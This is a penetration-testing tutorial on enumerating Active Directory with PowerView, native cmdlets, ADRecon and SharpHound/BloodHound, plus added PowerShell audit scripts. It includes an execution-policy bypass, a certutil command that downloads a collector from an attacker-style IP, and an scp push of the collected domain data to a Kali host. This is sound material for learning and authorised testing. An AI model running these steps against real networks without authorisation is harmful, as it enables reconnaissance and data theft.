AD Enumeration: Manual & Automated
This section covers practical techniques for enumerating Active Directory environments during internal assessments. It includes multiple methods to extract information about domain users, groups, computers, trusts, and permissions using tools such as rpcclient, ldapsearch, BloodHound, and PowerView. These enumeration steps are essential for identifying attack paths, privilege escalation opportunities, and domain misconfigurations, particularly in OSCP-style labs and real-world engagements.
Before starting enumeration, make sure to bypass the PowerShell execution policy with the command powershell -ep bypass. Then you'll be able to import scripts and execute them.
Enumeration Using PowerView
Import the PowerView module before starting the enumeration:
Import-Module .\PowerView.ps1
User and group enumeration
1. All users and user details in the domain
Get-DomainUser
Filter a specific set of attributes from the command result using PowerShell's select (Select-Object) filter:
Get-DomainUser | select cn, memberof
Domain and trust discovery
1. Domain info
Get-Domain
2. Domain controller info
Get-DomainController
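The two PowerView sections above (user/group enumeration with select filtering, and domain/DC discovery) can be combined into a single snapshot that keeps only the attributes an auditor needs. The following is an added example written for this page, not code from the PowerView project or the original author; it assumes PowerView.ps1 is already imported in a session running in the target domain's context, and the output folder name is an assumption.

```powershell
# Added example (not from the original page): a small PowerView-based domain snapshot.
# Assumes PowerView.ps1 has already been imported (Import-Module .\PowerView.ps1).
# The output folder name is an assumption.
$outDir = Join-Path $pwd 'ad-snapshot'
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

# 1. Domain and domain-controller overview
$domain = Get-Domain
$dcs    = Get-DomainController
"Domain: $($domain.Name)  Forest: $($domain.Forest)  PDC: $($domain.PdcRoleOwner)"
$dcs | Select-Object Name, IPAddress, OSVersion | Format-Table -AutoSize

# 2. Users: request only the attributes needed instead of the full LDAP object.
#    lastlogontimestamp is replicated between DCs (lastlogon is not), so it is the
#    safer choice when you query a single DC.
$users = Get-DomainUser -Properties samaccountname, cn, description, memberof,
                                    pwdlastset, lastlogontimestamp, useraccountcontrol

# Turn each memberof DN ("CN=Group,OU=...,DC=...") into the group name only
$groupNames = { ($_.memberof | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ';' }

$users |
    Select-Object samaccountname, cn, description, @{n='Groups'; e=$groupNames},
                  pwdlastset, lastlogontimestamp, useraccountcontrol |
    Export-Csv -Path (Join-Path $outDir 'users.csv') -NoTypeInformation

# 3. Quick filters on the same result set (no second LDAP query needed)
# Disabled accounts: userAccountControl bit 0x2 (ACCOUNTDISABLE) is set
$disabled = $users | Where-Object { ([int]$_.useraccountcontrol -band 2) -ne 0 }
# Accounts with a populated description field; these deserve a manual review
$withDescription = $users | Where-Object { $_.description }
# Accounts that have never logged on (attribute missing or still at the 1601 epoch)
$neverLoggedOn = $users | Where-Object { -not $_.lastlogontimestamp -or $_.lastlogontimestamp.Year -le 1601 }

"Users: $($users.Count)  Disabled: $(@($disabled).Count)  With description: $(@($withDescription).Count)  Never logged on: $(@($neverLoggedOn).Count)"
$disabled | Select-Object samaccountname, cn |
    Export-Csv -Path (Join-Path $outDir 'disabled-users.csv') -NoTypeInformation
```

Requesting attributes with -Properties and projecting them with Select-Object keeps the LDAP result small and the CSV readable; the same collection is then reused for every filter instead of re-querying the domain controller.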
ACLs and object permissions
SPN enumeration
GPO discovery
Enumeration using Built-in PowerShell
Native PowerShell AD cmdlets (requires RSAT or domain privileges)
User, group, and computer enumeration
Example: Get-ADUser, Get-ADGroupMember, Get-ADComputer
Bonus: using Get-WmiObject or Get-CimInstance for host-based data
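The native cmdlets listed above can produce a baseline report without any third-party script. The following is an added example written for this page, not code from Microsoft's module documentation or the original author; it assumes the ActiveDirectory module (RSAT) is installed and the session has read access to the domain. The 90-day staleness threshold and the file names are assumptions.

```powershell
# Added example (not from the original page): a baseline report built with the native
# ActiveDirectory module. Assumes RSAT (or the module on a DC) is installed and the
# session has read access to the domain. Thresholds and file names are assumptions.
Import-Module ActiveDirectory

$reportDir = Join-Path $pwd 'ad-baseline'
New-Item -ItemType Directory -Path $reportDir -Force | Out-Null
$staleDays = 90
$cutoff    = (Get-Date).AddDays(-$staleDays)

# Users with the attributes needed to spot stale or never-expiring accounts.
# LastLogonDate is derived from the replicated lastLogonTimestamp, which can lag
# the real last logon by up to about 14 days.
$users = Get-ADUser -Filter * -Properties MemberOf, LastLogonDate, PasswordLastSet,
                                          PasswordNeverExpires, Enabled, Description

$stale        = $users | Where-Object { $_.Enabled -and $_.LastLogonDate -and $_.LastLogonDate -lt $cutoff }
$neverExpires = $users | Where-Object { $_.Enabled -and $_.PasswordNeverExpires }

$stale        | Select-Object SamAccountName, LastLogonDate |
    Export-Csv (Join-Path $reportDir 'stale-users.csv') -NoTypeInformation
$neverExpires | Select-Object SamAccountName, PasswordLastSet |
    Export-Csv (Join-Path $reportDir 'password-never-expires.csv') -NoTypeInformation

# Privileged groups with nested membership expanded (-Recursive). Enterprise Admins and
# Schema Admins exist only in the forest root domain, so a lookup may fail in a child domain.
$privGroups  = 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators'
$privMembers = foreach ($g in $privGroups) {
    try {
        Get-ADGroupMember -Identity $g -Recursive -ErrorAction Stop |
            Select-Object @{n='Group'; e={ $g }}, SamAccountName, objectClass, distinguishedName
    } catch {
        Write-Warning "Group '$g' could not be read in this domain: $($_.Exception.Message)"
    }
}
$privMembers | Export-Csv (Join-Path $reportDir 'privileged-members.csv') -NoTypeInformation

# Computer inventory grouped by operating system, to surface unsupported builds
$computers = Get-ADComputer -Filter * -Properties OperatingSystem, OperatingSystemVersion, LastLogonDate
$computers | Group-Object OperatingSystem | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize
$computers | Select-Object Name, DNSHostName, OperatingSystem, OperatingSystemVersion, Enabled, LastLogonDate |
    Export-Csv (Join-Path $reportDir 'computers.csv') -NoTypeInformation

"Users: $($users.Count)  Stale (>$staleDays d): $(@($stale).Count)  PasswordNeverExpires: $(@($neverExpires).Count)  Privileged members: $(@($privMembers).Count)  Computers: $($computers.Count)"
```

Get-ADGroupMember -Recursive is the important detail: a user who is a Domain Admin only through a nested group does not appear in the group's direct member list, so a non-recursive query understates who actually holds the privilege.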
Enumeration using BloodHound / SharpHound
Automated graph-based enumeration
Enumerates trusts, sessions, ACLs, admin rights, group memberships
Includes collector examples and how to import into the GUI
Example: SharpHound.exe -c All, BloodHound GUI analysis
Enumeration using rpcclient and net commands
Enumeration using ldapsearch / ldapdomaindump
Automated Enumeration
Enumerating using ADRecon
ADRecon is a powerful PowerShell-based Active Directory reconnaissance script that collects a comprehensive range of domain information and exports it into structured Excel and CSV reports. It is particularly useful for red teamers, blue teamers, and auditors who need a high-level overview of the AD environment, including users, groups, trusts, GPOs, ACLs, DNS records, and more.
A great tool for automating Active Directory enumeration.
Prerequisites for using ADRecon
.NET Framework 3.0 or later (Windows 7 includes 3.0)
PowerShell 2.0 or later (Windows 7 includes 2.0)
PowerShell Core on Windows is supported (tested on PowerShell v7.2.2 running on Windows 10)
Enumerating Using Invoke-ADEnum
Invoke-ADEnum is a lightweight PowerShell script designed to automate Active Directory enumeration for red teamers and penetration testers. It gathers a broad range of domain information such as users, groups, computers, trust relationships, domain policies, and shares — using built-in PowerShell commands. This makes it highly effective in environments where importing large frameworks like PowerView or using SharpHound may not be feasible.
Using BloodHound
Using SharpHound to collect data and BloodHound to analyze it
Using SharpHound
Step 1: Download SharpHound to the Windows machine
certutil -urlcache -split -f http://192.168.45.222/SharpHound.ps1
If this does not work, you can try these methods.
Step 2: Import SharpHound into PowerShell
Import-Module .\SharpHound.ps1
Step 3: Invoke BloodHound for data collection
Invoke-BloodHound -CollectionMethod All -OutputDirectory $pwd -OutputPrefix "Pawan_audit"
Selecting -CollectionMethod All collects everything. You can check the other options with the command Get-Help Invoke-BloodHound.
Step 4: Get the audit zip file to your Kali machine.
Enable SSH on Kali and then push it with scp, if there are no other options available.
scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/Documents/directory/
Step 5: Start neo4j on Kali
sudo neo4j start
Step 6: Start BloodHound
sudo bloodhound
Step 7: Upload your audit zip file into BloodHound and analyze the result.
Do check the version compatibility of the SharpHound and BloodHound builds that you use. SharpHound version 2.0.0 is compatible with BloodHound version 4.3.1. Alternatively, use the SharpHound shipped with the installed BloodHound at /usr/lib/bloodhound/resources/app/Collectors, or, if using BloodHound CE, download the SharpHound collector from the web interface.
📚 References
- PowerSploit PowerView: learn about PowerView in detail.
- SharpHound
- ADRecon
- Invoke-ADEnum